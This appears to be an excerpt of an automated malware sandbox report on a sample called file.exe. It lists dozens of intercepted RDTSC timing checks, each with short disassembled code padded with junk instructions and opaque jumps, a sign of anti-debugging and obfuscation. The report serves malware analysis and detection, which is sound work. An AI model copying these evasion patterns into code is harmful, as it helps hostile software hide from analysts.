Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2F227 second address: C2F234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF92EC second address: BF92F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF982B second address: BF982F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF982F second address: BF9833 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF9833 second address: BF9841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F0F34BEC146h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF9841 second address: BF9845 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF9927 second address: BF9952 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jo 00007F0F34BEC146h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e add dword ptr [esp], 5C458550h 0x00000015 cmc 0x00000016 push 9B17C2AEh 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e jns 00007F0F34BEC146h 0x00000024 jnl 00007F0F34BEC146h 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF9ABD second address: BF9AC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF9AC1 second address: BF9B06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F0F34BEC151h 0x0000000c jmp 00007F0F34BEC14Bh 0x00000011 popad 0x00000012 push eax 0x00000013 jp 00007F0F34BEC15Ah 0x00000019 jmp 00007F0F34BEC154h 0x0000001e xchg eax, esi 0x0000001f mov dword ptr [ebp+122D2C2Ch], edi 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jnl 00007F0F34BEC146h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF9B06 second address: BF9B0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF9B0C second address: BF9B13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF9BCC second address: BF9C1F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0F345319E8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007F0F345319F4h 0x00000012 push edx 0x00000013 pop edx 0x00000014 popad 0x00000015 jmp 00007F0F345319EEh 0x0000001a popad 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f jmp 00007F0F345319F4h 0x00000024 mov eax, dword ptr [eax] 0x00000026 push esi 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF9C1F second address: BF9C25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF9E77 second address: BF9E7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF9E7B second address: BF9EB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0F34BEC151h 0x0000000b popad 0x0000000c nop 0x0000000d sbb edx, 2DCDE361h 0x00000013 push 00000004h 0x00000015 adc edx, 54241085h 0x0000001b nop 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F0F34BEC150h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF9EB6 second address: BF9EE5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 ja 00007F0F345319E6h 0x0000000d jmp 00007F0F345319F9h 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 pushad 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF9EE5 second address: BF9EEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFA199 second address: BFA19E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFA19E second address: BFA200 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC156h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a movsx ecx, cx 0x0000000d push 0000001Eh 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F0F34BEC148h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 push eax 0x0000002a mov edx, dword ptr [ebp+122D3EF0h] 0x00000030 pop edi 0x00000031 push eax 0x00000032 push ebx 0x00000033 pushad 0x00000034 jmp 00007F0F34BEC151h 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFA39F second address: BFA3A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFA3A3 second address: BFA3A9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFA65F second address: BFA6F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F0F345319EFh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push edx 0x00000011 pop edx 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push edx 0x00000016 jo 00007F0F345319E6h 0x0000001c pop edx 0x0000001d popad 0x0000001e nop 0x0000001f mov edx, 15C23500h 0x00000024 lea eax, dword ptr [ebp+1247DFB2h] 0x0000002a push eax 0x0000002b jns 00007F0F345319FBh 0x00000031 mov dword ptr [esp], eax 0x00000034 push 00000000h 0x00000036 push edi 0x00000037 call 00007F0F345319E8h 0x0000003c pop edi 0x0000003d mov dword ptr [esp+04h], edi 0x00000041 add dword ptr [esp+04h], 00000015h 0x00000049 inc edi 0x0000004a push edi 0x0000004b ret 0x0000004c pop edi 0x0000004d ret 0x0000004e sub dl, FFFFFFFEh 0x00000051 lea eax, dword ptr [ebp+1247DF6Eh] 0x00000057 and ecx, dword ptr [ebp+122D3CD4h] 0x0000005d nop 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007F0F345319F6h 0x00000065 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFA6F7 second address: BFA71E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC14Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F0F34BEC153h 0x00000012 jmp 00007F0F34BEC14Dh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFA71E second address: BFA723 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C33E0D second address: C33E17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F0F34BEC146h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C33E17 second address: C33E23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007F0F345319E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C33E23 second address: C33E50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC156h 0x00000007 jng 00007F0F34BEC148h 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 jbe 00007F0F34BEC14Eh 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C342E0 second address: C34301 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0F345319F0h 0x00000008 jbe 00007F0F345319E6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C34477 second address: C34488 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F34BEC14Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C34488 second address: C3448C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C346F6 second address: C3470E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jp 00007F0F34BEC146h 0x0000000d ja 00007F0F34BEC146h 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 pop eax 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3470E second address: C3472E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e ja 00007F0F345319E6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3472E second address: C34738 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0F34BEC146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C34738 second address: C34756 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F345319EEh 0x00000009 jmp 00007F0F345319ECh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C348CA second address: C348E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F0F34BEC15Ch 0x0000000c jmp 00007F0F34BEC150h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3651A second address: C3651F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3651F second address: C36542 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0F34BEC156h 0x00000008 pushad 0x00000009 je 00007F0F34BEC146h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3D11F second address: C3D125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3D125 second address: C3D129 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C41830 second address: C41843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F0F345319E6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F0F345319E6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C41843 second address: C41849 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C40F9C second address: C40FA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C40FA0 second address: C40FA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C40FA4 second address: C40FB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C40FB0 second address: C40FCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F34BEC157h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C40FCB second address: C40FCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4223E second address: C42249 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C447C9 second address: C447E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F0F345319EDh 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push esi 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C447E7 second address: C44803 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F34BEC14Fh 0x00000009 popad 0x0000000a jo 00007F0F34BEC148h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4761A second address: C4763B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F0F345319E6h 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F0F345319EDh 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4763B second address: C47647 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C47647 second address: C47654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F0F345319E6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C471A3 second address: C471F2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0F34BEC146h 0x00000008 jmp 00007F0F34BEC14Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 jmp 00007F0F34BEC150h 0x00000015 pop ebx 0x00000016 jnc 00007F0F34BEC162h 0x0000001c jmp 00007F0F34BEC156h 0x00000021 jbe 00007F0F34BEC146h 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C471F2 second address: C471F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4B1E9 second address: C4B20E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC152h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnl 00007F0F34BEC14Ch 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4E934 second address: C4E938 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4E938 second address: C4E93E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4EAC2 second address: C4EAC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4EAC8 second address: C4EACF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4EDC6 second address: C4EDDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F345319F4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C546BD second address: C546C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C546C3 second address: C546D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007F0F345319E6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C546D2 second address: C546D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C546D8 second address: C546F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F345319F6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C546F2 second address: C546FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C549AB second address: C549B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C549B2 second address: C549C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0F34BEC151h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C55695 second address: C5569B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5569B second address: C556D0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jp 00007F0F34BEC146h 0x0000000b pop esi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 jmp 00007F0F34BEC158h 0x00000015 pushad 0x00000016 popad 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 popad 0x0000001a push edx 0x0000001b push edi 0x0000001c pop edi 0x0000001d pop edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push edx 0x00000021 pop edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C556D0 second address: C556D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5D7E3 second address: C5D7E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5B7D7 second address: C5B803 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319F5h 0x00000007 push esi 0x00000008 jmp 00007F0F345319EBh 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5B803 second address: C5B809 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5B809 second address: C5B835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0F345319EDh 0x0000000a pushad 0x0000000b jmp 00007F0F345319F7h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5B99C second address: C5B9B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0F34BEC153h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5B9B5 second address: C5B9BF instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0F345319E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5B9BF second address: C5B9CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5C0C3 second address: C5C0C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5C0C7 second address: C5C0CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5C66C second address: C5C687 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319F7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C612E7 second address: C612EC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C612EC second address: C61310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F345319F7h 0x00000009 pop edi 0x0000000a je 00007F0F345319ECh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C606DB second address: C606E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6084F second address: C60867 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319F4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C60D6D second address: C60D73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C60D73 second address: C60D79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C60D79 second address: C60D7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6103A second address: C6103E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6103E second address: C61048 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0F34BEC146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C61048 second address: C6105D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F345319EFh 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6B19D second address: C6B1C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC159h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007F0F34BEC15Eh 0x00000011 push esi 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6B1C7 second address: C6B1D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 ja 00007F0F345319E6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6B319 second address: C6B31D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
